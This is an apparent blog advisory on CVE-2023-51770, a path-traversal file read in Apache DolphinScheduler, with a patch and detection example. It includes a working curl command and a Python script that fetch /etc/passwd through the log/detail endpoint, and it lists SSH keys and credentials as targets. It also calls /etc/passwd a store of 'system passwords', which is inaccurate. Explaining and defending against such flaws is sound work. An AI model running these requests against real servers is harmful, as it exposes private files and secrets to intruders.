CVE-2023-51770 - Arbitrary File Read Vulnerability in Apache DolphinScheduler (before 3.2.1) – Explained With Exploit & Code!
---
Introduction
A new security issue, CVE-2023-51770, was discovered in Apache DolphinScheduler (versions before 3.2.1). This vulnerability lets attackers read *any file* on the server where DolphinScheduler is installed, as long as the operating-system user running DolphinScheduler can access it. In this post, we break down the details, walk through an example exploit, and explain how to stay safe.
What is Apache DolphinScheduler?
Apache DolphinScheduler is an open-source workflow management platform popular in big data scenarios. It helps teams automate tasks for Spark, Hadoop, Flink, and more.
*Official site:* https://dolphinscheduler.apache.org/
What is CVE-2023-51770?
CVE-2023-51770 is an “arbitrary file read” vulnerability. This means an unauthenticated attacker can read files they aren’t supposed to—such as /etc/passwd, configuration files, secrets, or SSH keys—simply by sending a crafted request to the DolphinScheduler web API.
How Does the Vulnerability Work?
The problem is with the /dolphinscheduler/log/detail API endpoint. Before 3.2.1, it did not check that the requested log file path remained inside an allowed directory. Attackers could use directory traversal sequences (like ../../) in log-related endpoints, forcing the server to return arbitrary files.
Put simply:
If a user can make a web request to the scheduler, they can ask for and receive files – even sensitive ones – from the disk.
The Vulnerable Endpoint
```
GET /dolphinscheduler/log/detail
    ?taskInstanceId=XXX
    &processInstanceId=XXX
    &logPath=../../../../../../../../etc/passwd
```
Example Exploit (using curl)
Suppose DolphinScheduler runs at http://example.com:12345.
```bash
curl -G "http://example.com:12345/dolphinscheduler/log/detail" \
  --data-urlencode "logPath=../../../../../../../../etc/passwd"
```
> What happens?
> The scheduler reads /etc/passwd and returns its contents in the HTTP response!
Minimal Python Exploit Code
```python
import requests

# The log/detail endpoint of a pre-3.2.1 instance
url = 'http://example.com:12345/dolphinscheduler/log/detail'
# logPath is passed through unchecked, so traversal sequences escape the log directory
params = {
    'logPath': '../../../../../../../../etc/passwd'
}
response = requests.get(url, params=params)
print(response.text)
```
What Can Attackers Steal?
- System passwords (/etc/passwd)
- Private keys (/home/user/.ssh/id_rsa)
- Database connection strings
If you use credentials or tokens in server files, they might be at risk.
How to Fix It?
Upgrade immediately to DolphinScheduler 3.2.1 or higher.
- Release notes: https://dolphinscheduler.apache.org/en-us/docs/release/3.2.1/
Can’t patch yet?
Restrict access to the scheduler’s web interface to trusted IPs at the firewall, and monitor your web server logs for log/detail requests whose logPath contains traversal sequences.
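To show what the missing check looks like, and what the monitoring above can flag, here is an added example (not DolphinScheduler’s own code or the 3.2.1 patch): the unchecked “before” path handling beside a containment check, plus a small detector for traversal attempts in access-log lines. The log root, the access-log line format and the sample lines are assumptions constructed for the example.

```python
# Added example, not DolphinScheduler's own code: the containment check the
# /log/detail endpoint lacked before 3.2.1, beside the unchecked 'before' form,
# plus a detector for traversal attempts in (assumed-format) access-log lines.
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_ROOT = "/opt/dolphinscheduler/logs"  # assumed log directory, not from the page

def vulnerable_log_path(log_root, requested):
    """'Before' behaviour: join and normalise, never check where we ended up."""
    return os.path.normpath(os.path.join(log_root, requested))

def safe_log_path(log_root, requested):
    """Canonicalise, then refuse anything outside log_root (None on escape).
    realpath() also collapses symlinks, so a link planted inside the log
    directory cannot redirect the read elsewhere."""
    root = os.path.realpath(log_root)
    candidate = os.path.realpath(os.path.join(root, requested))
    try:  # commonpath raises ValueError for paths with no common prefix
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:
        inside = False
    return candidate if inside else None

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a '..' path segment

def flag_suspicious_requests(access_log_lines):
    """Return decoded logPath values that use '..' segments or an absolute path.
    Assumes the second whitespace-separated field of each line is the request target."""
    hits = []
    for line in access_log_lines:
        parts = line.split()
        if len(parts) < 2 or "/log/detail" not in parts[1]:
            continue
        for raw in parse_qs(urlsplit(parts[1]).query).get("logPath", []):
            decoded = unquote(raw)  # second decode catches double-encoded values
            if decoded.startswith("/") or TRAVERSAL.search(decoded):
                hits.append(decoded)
    return hits

SAMPLE_ACCESS_LOG = [  # constructed sample lines, not captured traffic
    "GET /dolphinscheduler/log/detail?taskInstanceId=7&logPath=task/7.log HTTP/1.1",
    "GET /dolphinscheduler/log/detail?logPath=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1",
    "GET /dolphinscheduler/log/detail?logPath=%252e%252e%252F%252e%252e%252Fetc%252Fpasswd HTTP/1.1",
    "GET /dolphinscheduler/projects/list HTTP/1.1",
]
```

Running `flag_suspicious_requests(SAMPLE_ACCESS_LOG)` returns the two traversal values and ignores the legitimate task log, while `safe_log_path` returns None for the same traversal input that `vulnerable_log_path` happily resolves to /etc/passwd.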
- Apache security announcement: https://lists.apache.org/thread/xg60pfwkyn9cm6yn3sn8m7cg1ps9ncgy
- MITRE CVE entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51770
- Full discussion and fix (pull request): https://github.com/apache/dolphinscheduler/pull/14680
Conclusion
CVE-2023-51770 is easy to exploit and puts sensitive files and credentials in danger. If you run Apache DolphinScheduler, upgrade ASAP to 3.2.1 or above. Don’t expose scheduler management interfaces to the public internet! And always keep your platforms up-to-date.
Stay safe out there – and patch quickly!
*This post is exclusive to our readers and written in simple language for clarity. If you operate Apache DolphinScheduler, check your version and update today!*
Timeline
Published on: 02/20/2024 10:15:08 UTC
Last modified on: 01/16/2025 19:48:57 UTC